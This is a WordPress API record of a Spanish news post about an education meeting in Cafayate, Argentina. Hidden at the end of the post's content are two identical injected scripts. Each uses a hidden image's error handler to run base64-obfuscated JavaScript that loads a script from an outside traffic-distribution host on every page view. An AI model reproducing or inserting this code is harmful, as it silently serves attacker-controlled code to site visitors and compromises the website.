{"id":4517,"date":"2024-10-24T09:31:45","date_gmt":"2024-10-24T12:31:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4517"},"modified":"2025-08-13T23:46:53","modified_gmt":"2025-08-14T02:46:53","slug":"se-realizara-en-cafayate-el-primer-encuentro-educar-es-un-acto-de-esperanza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4517","title":{"rendered":"Se realizar\u00e1 en Cafayate el Primer Encuentro \u00abEducar es un acto de esperanza\u00bb"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><strong><em>El encuentro se realizar\u00e1 el s\u00e1bado 26 de octubre en el Centro de Convenciones Cafayate y est\u00e1 organizado por la Prelatura Territorial de Cafayate.<\/em><\/strong><\/h3>\n\n\n\n<p>El Centro Convenciones Cafayate, que desde su apertura concit\u00f3 el inter\u00e9s de diversos sectores para la realizaci\u00f3n de eventos con una importante presencia del Turismo de Reuniones, ser\u00e1 sede del Primer Encuentro de actualizaci\u00f3n e intercambio de experiencias de las Escuelas en el que se desarrollar\u00e1 el tema \u00abEducar es un acto de esperanza\u00bb, organizado por la Prelatura Territorial de Cafayate.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, junto al obispo de Cafayate, Monse\u00f1or&nbsp;<strong>Dar\u00edo Quintana<\/strong>, y el Vicedirector Nivel Secundario del Instituto Agustiniano, profesor&nbsp;<strong>Sebasti\u00e1n Jasson<\/strong>, presentaron las actividades del encuentro que se realizar\u00e1 el 26 de octubre de 8.30 a 16 hs. El mismo contar\u00e1 con paneles con invitados especiales, talleres para docentes y presentaci\u00f3n de trabajos libres de experiencias y proyectos innovadores realizados o en curso.<\/p>\n\n\n\n<p>En la oportunidad, el ministro Mario Pe\u00f1avdestac\u00f3 la importancia de este evento educativo manifestando su deseo de que \u201ceste encuentro se desarrolle todos los a\u00f1os\u201d, agregando adem\u00e1s que \u201cel Centro de Convenciones Cafayate ya tiene una agenda de eventos de diversas \u00e1reas para los pr\u00f3ximos meses, que comenzar\u00e1n a posicionar esta sede de eventos tan importante para el desarrollo del turismo de reuniones en el Valle Calchaqu\u00ed y para todos los sectores econ\u00f3micos que se benefician\u201d.<\/p>\n\n\n\n<p>Por su parte, monse\u00f1or Quintana agradeci\u00f3 al gobierno provincial por la posibilidad de realizar el encuentro en las instalaciones del Centro de Convenciones Cafayate y destac\u00f3 que la prelatura a su cargo est\u00e1 compuesta por departamentos de las provincias de Salta, Tucum\u00e1n y Catamarca, que participar\u00e1n del encuentro en el que se compartir\u00e1n experiencias en talleres y disertaciones a cargo de expertos. Monse\u00f1or indic\u00f3 que se trabajar\u00e1 en c\u00f3mo el educador genera en los alumnos la virtud de que todos \u201cseamos hermanos\u201d.&nbsp;<\/p>\n\n\n\n<p>En tanto, Jasson indic\u00f3 que los docentes podr\u00e1n participar con ponencias para compartir con colegas, se\u00f1alando adem\u00e1s que se trabajar\u00e1 en quince ejes tem\u00e1ticos en todos los niveles educativos.&nbsp;<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n e inscripciones los interesados pueden ingresar en el Facebook &nbsp;de Prelatura de Cafayate.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-en-cafayate-el-primer-encuentro-educar-es-un-acto-de-esperanza-98367\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El encuentro se realizar\u00e1 el s\u00e1bado 26 de octubre en el Centro de Convenciones Cafayate y est\u00e1 organizado por la Prelatura Territorial de Cafayate. El Centro Convenciones Cafayate, que desde su apertura concit\u00f3 el inter\u00e9s de diversos sectores para la realizaci\u00f3n de eventos con una importante presencia del Turismo de Reuniones, ser\u00e1 sede del Primer [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4518,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-4517","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4517"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4517"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4517\/revisions"}],"predecessor-version":[{"id":6657,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4517\/revisions\/6657"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4518"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}